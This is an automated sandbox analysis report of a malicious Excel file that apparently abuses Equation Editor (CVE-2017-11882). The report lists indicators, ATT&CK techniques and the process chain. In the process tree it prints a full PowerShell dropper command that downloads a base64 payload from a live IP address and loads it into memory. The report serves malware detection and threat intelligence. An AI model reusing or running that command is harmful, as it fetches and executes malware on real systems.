Resubmissions

01-02-2023 17:02

230201-vj6p3aah39 10

01-02-2023 17:00

230201-vjf5eacg4s 10

01-02-2023 16:57

230201-vgbrxacg2y 10

Analysis

  • max time kernel
    105s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    01-02-2023 16:57

General

  • Target

    macintosh.xlsx

  • Size

    776KB

  • MD5

    f39fa9ca70c1acce62be880ee713e8ef

  • SHA1

    0322f8b96aa93a7ee08533caac82bfdc89f660c0

  • SHA256

    3590e97c8e6c65becfce92c63e164a2c808e7e9cb366cfc4c8ff76d7cc28a831

  • SHA512

    6464d892bb2b98c6340dcfd118a870275d35a99d45f1cf8117c3971cd3a38d418388bb04385e45cca9e68ddf2060099ae29b4bfdf25e90940d436517493cbc69

  • SSDEEP

    12288:BML7nvXmvR+hfBScVzn8HrDTUpU5HiiElrg2dFZI6ARIN2JmGbh3mv/IQzwISMIF:ImvRgMknUvQsMzfILRIVJ8v

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://172.174.176.153/dll/NoStartUp.ppam

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\macintosh.xlsx
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1008
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\yyyyyyyytttt.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1716
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/NoStartUp.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.ahhahahahahaup/031.04.331.591//:ptth'))
        3⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:632

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Exploitation for Client Execution

1
T1203

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\yyyyyyyytttt.vbs
    Filesize

    420KB

    MD5

    e1c793d5cef9d75d3246ed299abb6613

    SHA1

    ae050d02fb0691cc24d7b0f1b95048f8f37bac36

    SHA256

    bf838eba21f9aea4ab52b2b32ca2a59657ad70e4d41bc02e73bb1b6e3d0bf90e

    SHA512

    82eb2a89818a21138b40e44b742f2ad9a2c4a02e80f080fc37f0c98019ad28c894adc641a1af64ad51c78b539e1f30624178e3f3665a6c8b4a578eed70d6ad57

  • memory/632-66-0x000000006C170000-0x000000006C71B000-memory.dmp
    Filesize

    5.7MB

  • memory/632-63-0x0000000000000000-mapping.dmp
  • memory/632-65-0x000000006C170000-0x000000006C71B000-memory.dmp
    Filesize

    5.7MB

  • memory/1008-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1008-57-0x00000000720DD000-0x00000000720E8000-memory.dmp
    Filesize

    44KB

  • memory/1008-58-0x0000000075C51000-0x0000000075C53000-memory.dmp
    Filesize

    8KB

  • memory/1008-55-0x00000000710F1000-0x00000000710F3000-memory.dmp
    Filesize

    8KB

  • memory/1008-54-0x000000002FC01000-0x000000002FC04000-memory.dmp
    Filesize

    12KB

  • memory/1008-67-0x00000000720DD000-0x00000000720E8000-memory.dmp
    Filesize

    44KB

  • memory/1008-68-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1008-69-0x00000000720DD000-0x00000000720E8000-memory.dmp
    Filesize

    44KB

  • memory/1716-60-0x0000000000000000-mapping.dmp